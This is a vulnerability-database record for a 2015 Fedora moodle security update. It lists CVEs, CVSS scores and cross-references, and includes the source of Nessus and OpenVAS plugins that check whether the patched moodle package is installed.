ID FEDORA:EF305601CACA
Type fedora
Reporter Fedora
Modified 2015-04-05T14:33:57
Description
Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities.
{"id": "FEDORA:EF305601CACA", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 21 Update: moodle-2.7.7-1.fc21", "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "published": "2015-04-05T14:33:57", "modified": "2015-04-05T14:33:57", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2015-1493", "CVE-2015-2267", "CVE-2015-2268", "CVE-2015-2269", "CVE-2015-2270", "CVE-2015-2271", "CVE-2015-2272", "CVE-2015-2273"], "lastseen": "2020-12-21T08:17:52", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "fedora", "idList": ["FEDORA:461F560129B7", "FEDORA:2BA6A60877D3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310869540", "OPENVAS:1361412562310869172", "OPENVAS:1361412562310869170"]}, {"type": "nessus", "idList": ["FEDORA_2015-4530.NASL", "FEDORA_2015-4724.NASL", "FEDORA_2015-4613.NASL"]}, {"type": "cve", "idList": ["CVE-2015-2268", "CVE-2015-2270", "CVE-2015-2272", "CVE-2015-2273", "CVE-2015-2269", "CVE-2015-2271", "CVE-2015-2267", "CVE-2015-1493"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130865"]}, {"type": "zdt", "idList": ["1337DAY-ID-23411"]}, {"type": "exploitdb", "idList": ["EDB-ID:36418"]}, {"type": "zeroscience", "idList": ["ZSL-2015-5236"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5B59BDED7A2F1B9EC3BDFA6E973A9C07"]}], "modified": "2020-12-21T08:17:52", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-12-21T08:17:52", "rev": 2}, "vulnersScore": 5.4}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "21", "arch": "any", "packageName": "moodle", "packageVersion": "2.7.7", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1493", "CVE-2015-2267", "CVE-2015-2268", "CVE-2015-2269", "CVE-2015-2270", "CVE-2015-2271", "CVE-2015-2272", "CVE-2015-2273"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2015-04-21T18:26:37", "published": "2015-04-21T18:26:37", "id": "FEDORA:461F560129B7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: moodle-2.8.5-1.fc22", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0008", "CVE-2014-0122", "CVE-2014-0123", "CVE-2014-0124", "CVE-2014-0125", "CVE-2014-0126", "CVE-2014-0127", "CVE-2014-0129", "CVE-2014-0213", "CVE-2014-0214", "CVE-2014-0215", "CVE-2014-0216", "CVE-2014-0217", "CVE-2014-0218", "CVE-2014-3541", "CVE-2014-3542", "CVE-2014-3543", "CVE-2014-3544", "CVE-2014-3545", "CVE-2014-3546", "CVE-2014-3547", "CVE-2014-3548", "CVE-2014-3549", "CVE-2014-3550", "CVE-2014-3551", "CVE-2014-3552", "CVE-2014-3553", "CVE-2015-1493", "CVE-2015-2267", "CVE-2015-2268", "CVE-2015-2269", "CVE-2015-2270", "CVE-2015-2271", "CVE-2015-2272", "CVE-2015-2273"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2015-04-05T14:29:57", "published": "2015-04-05T14:29:57", "id": "FEDORA:2BA6A60877D3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: moodle-2.6.10-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:13:35", "description": "Update to latest versions of the respective branches. f20 has been\nupdated from 2.5.x to 2.6.x because 2.5.x is EOL.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-04-07T00:00:00", "title": "Fedora 20 : moodle-2.6.10-1.fc20 (2015-4530)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2269", "CVE-2015-2272", "CVE-2015-2270", "CVE-2015-2267", "CVE-2015-2266", "CVE-2015-1493", "CVE-2015-2273", "CVE-2015-2271", "CVE-2015-2268"], "modified": "2015-04-07T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2015-4530.NASL", "href": "https://www.tenable.com/plugins/nessus/82601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4530.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82601);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1493\", \"CVE-2015-2266\", \"CVE-2015-2267\", \"CVE-2015-2268\", \"CVE-2015-2269\", \"CVE-2015-2270\", \"CVE-2015-2271\", \"CVE-2015-2272\", \"CVE-2015-2273\");\n script_xref(name:\"FEDORA\", value:\"2015-4530\");\n\n script_name(english:\"Fedora 20 : moodle-2.6.10-1.fc20 (2015-4530)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest versions of the respective branches. f20 has been\nupdated from 2.5.x to 2.6.x because 2.5.x is EOL.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1190119\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1203203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1203205\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154251.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9dc8b81f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"moodle-2.6.10-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2021-01-12T10:13:35", "description": "Update to latest versions of the respective branches. f20 has been\nupdated from 2.5.x to 2.6.x because 2.5.x is EOL.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-04-22T00:00:00", "title": "Fedora 22 : moodle-2.8.5-1.fc22 (2015-4613)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2269", "CVE-2015-2272", "CVE-2015-2270", "CVE-2015-2267", "CVE-2015-2266", "CVE-2015-1493", "CVE-2015-2273", "CVE-2015-2271", "CVE-2015-2268"], "modified": "2015-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-4613.NASL", "href": "https://www.tenable.com/plugins/nessus/82939", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4613.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82939);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1493\", \"CVE-2015-2266\", \"CVE-2015-2267\", \"CVE-2015-2268\", \"CVE-2015-2269\", \"CVE-2015-2270\", \"CVE-2015-2271\", \"CVE-2015-2272\", \"CVE-2015-2273\");\n script_xref(name:\"FEDORA\", value:\"2015-4613\");\n\n script_name(english:\"Fedora 22 : moodle-2.8.5-1.fc22 (2015-4613)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest versions of the respective branches. f20 has been\nupdated from 2.5.x to 2.6.x because 2.5.x is EOL.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1190119\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1203203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1203205\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154920.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d45aafa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"moodle-2.8.5-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2021-01-12T10:13:36", "description": "Update to latest versions of the respective branches. f20 has been\nupdated from 2.5.x to 2.6.x because 2.5.x is EOL.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-04-07T00:00:00", "title": "Fedora 21 : moodle-2.7.7-1.fc21 (2015-4724)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2269", "CVE-2015-2272", "CVE-2015-2270", "CVE-2015-2267", "CVE-2015-2266", "CVE-2015-1493", "CVE-2015-2273", "CVE-2015-2271", "CVE-2015-2268"], "modified": "2015-04-07T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:moodle"], "id": "FEDORA_2015-4724.NASL", "href": "https://www.tenable.com/plugins/nessus/82610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4724.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82610);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1493\", \"CVE-2015-2266\", \"CVE-2015-2267\", \"CVE-2015-2268\", \"CVE-2015-2269\", \"CVE-2015-2270\", \"CVE-2015-2271\", \"CVE-2015-2272\", \"CVE-2015-2273\");\n script_xref(name:\"FEDORA\", value:\"2015-4724\");\n\n script_name(english:\"Fedora 21 : moodle-2.7.7-1.fc21 (2015-4724)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest versions of the respective branches. f20 has been\nupdated from 2.5.x to 2.6.x because 2.5.x is EOL.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1190119\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1203203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1203205\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154281.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?31ff9858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"moodle-2.7.7-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:37:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2269", "CVE-2015-2272", "CVE-2015-2270", "CVE-2015-2267", "CVE-2015-2266", "CVE-2015-1493", "CVE-2015-2273", "CVE-2015-2271", "CVE-2015-2268"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869540", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2015-4613", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle FEDORA-2015-4613\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869540\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:23:38 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-2269\", \"CVE-2015-2268\", \"CVE-2015-2267\", \"CVE-2015-2266\",\n \"CVE-2015-2272\", \"CVE-2015-2273\", \"CVE-2015-2270\", \"CVE-2015-2271\",\n \"CVE-2015-1493\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2015-4613\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-4613\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154920.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~2.8.5~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2269", "CVE-2015-2272", "CVE-2015-2270", "CVE-2015-2267", "CVE-2015-2266", "CVE-2015-1493", "CVE-2015-2273", "CVE-2015-2271", "CVE-2015-2268"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-04-06T00:00:00", "id": "OPENVAS:1361412562310869170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869170", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2015-4724", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle FEDORA-2015-4724\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-06 07:13:01 +0200 (Mon, 06 Apr 2015)\");\n script_cve_id(\"CVE-2015-2269\", \"CVE-2015-2268\", \"CVE-2015-2267\", \"CVE-2015-2266\",\n \"CVE-2015-2272\", \"CVE-2015-2273\", \"CVE-2015-2270\", \"CVE-2015-2271\",\n \"CVE-2015-1493\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2015-4724\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-4724\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154281.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~2.7.7~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2269", "CVE-2014-3546", "CVE-2014-0124", "CVE-2014-3553", "CVE-2015-2272", "CVE-2015-2270", "CVE-2015-2267", "CVE-2014-0008", "CVE-2014-3542", "CVE-2014-3544", "CVE-2014-3541", "CVE-2014-3550", "CVE-2015-2266", "CVE-2014-0126", "CVE-2014-0215", "CVE-2014-0214", "CVE-2015-1493", "CVE-2015-2273", "CVE-2015-2271", "CVE-2014-0122", "CVE-2014-3549", "CVE-2014-0216", "CVE-2014-3552", "CVE-2014-0213", "CVE-2015-2268", "CVE-2014-3551", "CVE-2014-0127", "CVE-2014-0129", "CVE-2014-3543", "CVE-2014-0218", "CVE-2014-3547", "CVE-2014-0123", "CVE-2014-0125", "CVE-2014-0217", "CVE-2014-3545", "CVE-2014-3548"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-04-06T00:00:00", "id": "OPENVAS:1361412562310869172", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869172", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2015-4530", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle FEDORA-2015-4530\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See 